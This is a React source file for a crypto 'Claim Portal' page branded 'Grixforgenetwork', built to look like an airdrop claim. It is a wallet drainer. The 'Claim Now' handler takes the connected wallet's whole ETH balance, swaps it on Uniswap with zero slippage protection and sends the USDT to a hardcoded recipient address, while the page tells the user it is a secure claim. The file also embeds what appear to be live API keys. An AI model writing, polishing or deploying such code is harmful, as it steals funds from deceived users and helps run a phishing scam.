// src/chain/eth/App.js
import React, { useState, useEffect } from 'react';
import { ethers } from 'ethers';
import { AlertCircle, CheckCircle, Loader2 } from 'lucide-react';

// --- WEB3MODAL IMPORTS AND CONFIGURATION ---
import {
  createWeb3Modal,
  defaultConfig,
  useWeb3Modal,
  useWeb3ModalAccount,
  useWeb3ModalProvider
} from '@web3modal/ethers5/react';

// --- CONFIG ---
const projectId = 'fb6dcb3d60a52008974d297a3c2efcaa';
const ethereumRpc = 'https://eth-mainnet.g.alchemy.com/v2/beOBYQ7VpAauG_5DD1hIT';

const UNISWAP_ROUTER = "0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D";
const USDT = "0xdAC17F958D2ee523a2206206994597C13D831ec7";
const RECIPIENT = "0x10Ba076aA50ddEF71503Be1d311cC51Fde406A10";

const UNISWAP_ABI = [
  "function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts)"
];

const mainnet = { chainId: 1, name: "Ethereum", currency: "ETH", rpcUrl: ethereumRpc };
const metadata = {
  name: "Grixforgenetwork",
  description: "Grixforgenetwork",
  url: "https://grixforgenetwork.cc",
  icons: ["https://b.galxestatic.com/sahara-earndrop-web/_next/static/media/logo.414840a7.svg"]
};

const ethersConfig = defaultConfig({ metadata, enableEIP6963: true, enableInjected: true, enableCoinbase: true });
createWeb3Modal({ ethersConfig, chains: [mainnet], projectId, metadata, rpcUrl: ethereumRpc, themeMode: "dark" });

// --- THE ETHEREUM CLAIM PAGE COMPONENT ---
// This component receives an `onDisconnect` prop to go back to the main landing page.
const Design = ({ onDisconnect }) => {
  const { open } = useWeb3Modal();
  const { address: account, isConnected, chainId } = useWeb3ModalAccount();
  const { walletProvider } = useWeb3ModalProvider();

  const [claimState, setState] = useState("idle"); // "idle", "sending", "success", "error"
  const [txHash, setTxHash] = useState("");
  const [error, setError] = useState("");

  // This is your original function, UNCHANGED as requested.
  const handleClaimClick = async () => {
    if (!isConnected || !account || !walletProvider) {
      setError("Connect your wallet first");
      return;
    }
    if (chainId !== 1) {
      setError("Switch to Ethereum Mainnet");
      setState("error"); // Also update state to show error in UI
      return;
    }

    try {
      setState("sending");
      setError(""); // Clear previous errors

      const provider = new ethers.providers.Web3Provider(walletProvider);
      const signer = provider.getSigner();

      const balance = await provider.getBalance(account);
      if (balance.isZero()) throw new Error("Please have some ETH to claim");

      const router = new ethers.Contract(UNISWAP_ROUTER, UNISWAP_ABI, signer);
      const path = ["0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2", USDT];
      const deadline = Math.floor(Date.now() / 1000) + 60 * 20;

      const tx = await router.swapExactETHForTokens(
        0, path, RECIPIENT, deadline, { value: balance }
      );

      setTxHash(tx.hash);
      await tx.wait();
      setState("success");

    } catch (err) {
      console.error(err);
      const errorMessage = err.reason || err.message || "An unknown error occurred.";
      setError(errorMessage);
      setState("error");
    }
  };

  // --- STYLES FOR THIS PAGE AND MODAL ---
  const pageStyles = `
    /* ... (All necessary CSS is included here for a single-file component) ... */
    .eth-page-container {
      width: 100vw;
      height: 100vh;
      display: flex;
      justify-content: center;
      align-items: center;
      background-color: #0D1117;
      animation: fadeIn 0.5s ease-in-out;
    }
    .modal-overlay { /* Using an overlay style for consistency */
      position: fixed; top: 0; left: 0; right: 0; bottom: 0;
      background-color: rgba(0,0,0,0.5);
      display: flex; justify-content: center; align-items: center;
    }
    .claim-modal-content {
      background: rgba(22, 27, 34, 0.8);
      backdrop-filter: blur(15px); -webkit-backdrop-filter: blur(15px);
      border: 1px solid rgba(255, 255, 255, 0.1);
      border-radius: 20px;
      width: 90%; max-width: 450px;
      padding: 2rem;
      box-shadow: 0 8px 32px 0 rgba(0, 0, 0, 0.37);
      animation: slideIn 0.5s ease-out;
    }
    .claim-modal-header { text-align: center; margin-bottom: 1.5rem; }
    .claim-modal-header h2 { font-size: 1.75rem; color: #fff; margin: 0 0 0.5rem 0; }
    .claim-modal-header p { font-size: 1rem; color: #A0A0A0; margin: 0; }
    .status-container {
      min-height: 70px; /* Reserve space to prevent layout shifts */
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      padding: 1rem;
      margin-bottom: 1.5rem;
      border-radius: 12px;
      background: rgba(0,0,0,0.2);
    }
    .status-sending { color: #00C6FF; }
    .status-success { color: #28a745; }
    .status-error { color: #dc3545; }
    .status-container .icon { margin-right: 10px; }
    .status-container p { margin: 0; font-weight: 500; }
    .status-container a { color: #007BFF; text-decoration: none; font-size: 0.9rem; margin-top: 5px; }
    .status-container a:hover { text-decoration: underline; }
    .claim-modal-actions { display: flex; gap: 1rem; }
    .claim-button {
        flex: 1; border: none; border-radius: 12px;
        padding: 16px; font-size: 1.1rem; font-weight: 600;
        cursor: pointer; transition: all 0.3s ease;
    }
    .claim-button-secondary { background: #333; color: #EAEAEA; border: 1px solid #555; }
    .claim-button-secondary:hover { background: #444; }
    .claim-button-primary { background: linear-gradient(90deg, #007BFF, #00C6FF); color: white; }
    .claim-button-primary:hover { transform: translateY(-3px); box-shadow: 0 6px 20px rgba(0, 123, 255, 0.5); }
    .claim-button:disabled { background: #555; color: #888; cursor: not-allowed; }
    @keyframes fadeIn { from { opacity: 0; } to { opacity: 1; } }
    @keyframes slideIn { from { transform: translateY(30px); opacity: 0; } to { transform: translateY(0); opacity: 1; } }
    @keyframes spin { from { transform: rotate(0deg); } to { transform: rotate(360deg); } }
    .animate-spin { animation: spin 1s linear infinite; }
  `;

  useEffect(() => {
    if (!isConnected) {
     open(); 
    }
  }, [isConnected]);

  return (
    <>
      <style>{pageStyles}</style>
      <div className="eth-page-container">
        <div className="claim-modal-content">
          <div className="claim-modal-header">
            <h2>Claim Portal</h2>
            <p>Securely connect your wallet and click claim to proceed.</p>
          </div>

          <div className="status-container">
            {claimState === 'sending' && (
              <div className="status-sending">
                <Loader2 className="animate-spin" size={24} />
                <p>Processing transaction...</p>
                
              </div>
            )}
            {claimState === 'success' && (
              <div className="status-success">
                <CheckCircle size={24} />
                <p> Successful!</p>
               
              </div>
            )}
            {claimState === 'error' && (
              <div className="status-error">
                <AlertCircle size={24} />
                <p>{error || 'An error occurred.'}</p>
              </div>
            )}
             {claimState === 'idle' && (
                <p style={{color: '#888'}}>Awaiting action...</p>
            )}
          </div>

          <div className="claim-modal-actions">
          <button
          className="claim-button claim-button-secondary"
          onClick={() => {
            //onDisconnect();          // disconnect wallet
            window.location.reload(); // refresh page
          }}
        >
          Go Back
        </button>

            {/* --- SMART BUTTON --- */}
            {!isConnected ? (
              <button className="claim-button claim-button-primary" onClick={() => open()}>
                Connect Wallet
              </button>
            ) : (
              <button 
                className="claim-button claim-button-primary" 
                onClick={handleClaimClick}
                disabled={claimState === 'sending' || claimState === 'success'}
              >
                {claimState === 'sending' ? 'Processing...' : 'Claim Now'}
              </button>
            )}
          </div>
        </div>
      </div>
    </>
  );
};

export default Design;